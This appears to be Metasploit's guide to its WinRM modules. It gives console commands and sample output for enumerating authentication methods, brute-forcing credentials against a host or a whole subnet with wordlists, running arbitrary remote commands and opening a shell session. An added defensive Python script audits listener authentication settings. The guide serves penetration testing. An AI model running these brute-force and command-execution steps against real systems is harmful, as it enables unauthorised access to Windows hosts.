Metasploit Guide WinRM
Windows Remote Management (WinRM), is a way for clients to remotely manage Windows computers. WinRM is built on top of the Simple Object Access Protocol (SOAP) over HTTP(S).
There are two main ports for WinRM:
- 5985/TCP - HTTP
- 5986/TCP - HTTPS
Important: Before running the chosen WinRM Metasploit module, first ensure that the RPORT and SSL values are configured correctly.
Either with the modern inline option support:

```
use scanner/winrm/winrm_auth_methods
run http://192.168.123.139:5985
run https://192.168.123.139:5986
```

Or by manually setting options:

```
use scanner/winrm/winrm_auth_methods
set RHOST 192.168.123.139
set RPORT 5985
set SSL false
run
```
Metasploit has support for multiple WinRM modules, including:
- Authentication enumeration
- Verifying/bruteforcing credentials
- Running commands and opening sessions
There are more modules than listed here. For the full list of modules, run the search command within msfconsole:

```
msf6 > search winrm
```
The WinRM modules work against Windows instances which have WinRM installed and configured. For a domain controller, the "Allow remote server management through WinRM" policy will need to be enabled.

It is only possible to use WinRM against accounts which are members of the Remote Management Users group.
WinRM over HTTPS requires the creation of a Server Authenticating Certificate, as well as enabling the transport mode:

```
winrm quickconfig -transport:https
```
Enumerate WinRM authentication mechanisms:

```
use scanner/winrm/winrm_auth_methods
run http://192.168.123.139:5985
run https://192.168.123.139:5986
```

Example:

```
msf6 auxiliary(scanner/winrm/winrm_auth_methods) > run http://192.168.123.139:5985
[+] 192.168.123.139:5985: Negotiate protocol supported
[+] 192.168.123.139:5985: Kerberos protocol supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
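The module above reads the WWW-Authenticate headers that a WinRM listener returns on an unauthenticated POST to /wsman. The following added script (not part of Metasploit or of this guide) does the same check from the administrator's side so you can verify what your own listeners advertise and flag Basic over plain HTTP or CredSSP; the `assess()` findings and the sample headers are constructed for the example.

```python
"""Audit which authentication mechanisms a WinRM listener advertises.

Added example, not Metasploit's winrm_auth_methods module. It inspects the
WWW-Authenticate headers in the 401 reply that WinRM sends to an
unauthenticated POST against /wsman on port 5985 (HTTP) or 5986 (HTTPS).
"""
import urllib.request
from urllib.error import HTTPError


def parse_auth_methods(header_values):
    """Extract scheme names (Negotiate, Kerberos, Basic, CredSSP, ...) from
    one or more WWW-Authenticate header values, preserving order."""
    found = []
    for value in header_values:
        for chunk in value.split(","):          # several schemes may share one header
            token = chunk.strip().split(" ", 1)[0]
            if token and "=" not in token and token not in found:
                found.append(token)
    return found


def assess(methods, https):
    """Return the findings a defender cares about for one listener."""
    findings = []
    if "Basic" in methods and not https:
        findings.append("Basic auth over HTTP: credentials are only base64-encoded on the wire")
    if "CredSSP" in methods:
        findings.append("CredSSP enabled: the client's credentials are delegated to this host")
    return findings


def probe(url, timeout=5):
    """POST an empty body to <url>/wsman and return the advertised schemes.
    Assumes <url> is scheme://host:port of a listener you administer."""
    req = urllib.request.Request(url.rstrip("/") + "/wsman", data=b"", method="POST",
                                 headers={"Content-Type": "application/soap+xml;charset=UTF-8"})
    try:
        urllib.request.urlopen(req, timeout=timeout)
    except HTTPError as err:
        if err.code == 401:
            return parse_auth_methods(err.headers.get_all("WWW-Authenticate") or [])
        raise
    return []  # a listener that accepts an unauthenticated request advertises nothing


if __name__ == "__main__":
    # Constructed headers in the shape a default WinRM listener returns on 5985.
    sample = ["Negotiate", "Kerberos", 'Basic realm="WSMan"']
    methods = parse_auth_methods(sample)
    print("advertised:", methods)
    for finding in assess(methods, https=False):
        print("[!]", finding)
```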
Brute-force host with known user and password list:

```
use scanner/winrm/winrm_login
run https://user@192.168.123.139:5986 threads=50 pass_file=./wordlist.txt
```
Brute-force credentials:

```
use scanner/winrm/winrm_login
run http://192.168.123.139:5985 threads=50 user_file=./users.txt pass_file=./wordlist.txt
```
Brute-force credentials in a subnet:

```
use scanner/winrm/winrm_login
run cidr:/24:http://user:pass@192.168.123.139:5985 threads=50
run cidr:/24:http://user@192.168.123.139:5985 threads=50 pass_file=./wordlist.txt
```
To execute arbitrary commands against a Windows target:

```
use scanner/winrm/winrm_cmd
run http://user:pass@192.168.123.139:5985 cmd='whoami; ipconfig; systeminfo'
```
If you have valid credentials, the scanner/winrm/winrm_login module will open a Metasploit session for you:

```
use scanner/winrm/winrm_login
run http://user:pass@192.168.123.139:5985
```
Example:

```
msf6 auxiliary(scanner/winrm/winrm_login) > run http://user:pass@192.168.123.139:5985
[!] No active DB -- Credential data will not be saved!
[+] 192.168.123.139:5985 - Login Successful: WORKSTATION\user:pass
[*] Command shell session 7 opened (192.168.123.1:58673 -> 192.168.123.139:5985 ) at 2022-04-23 02:36:34 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
[*] Starting interaction with 7...

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\user>
```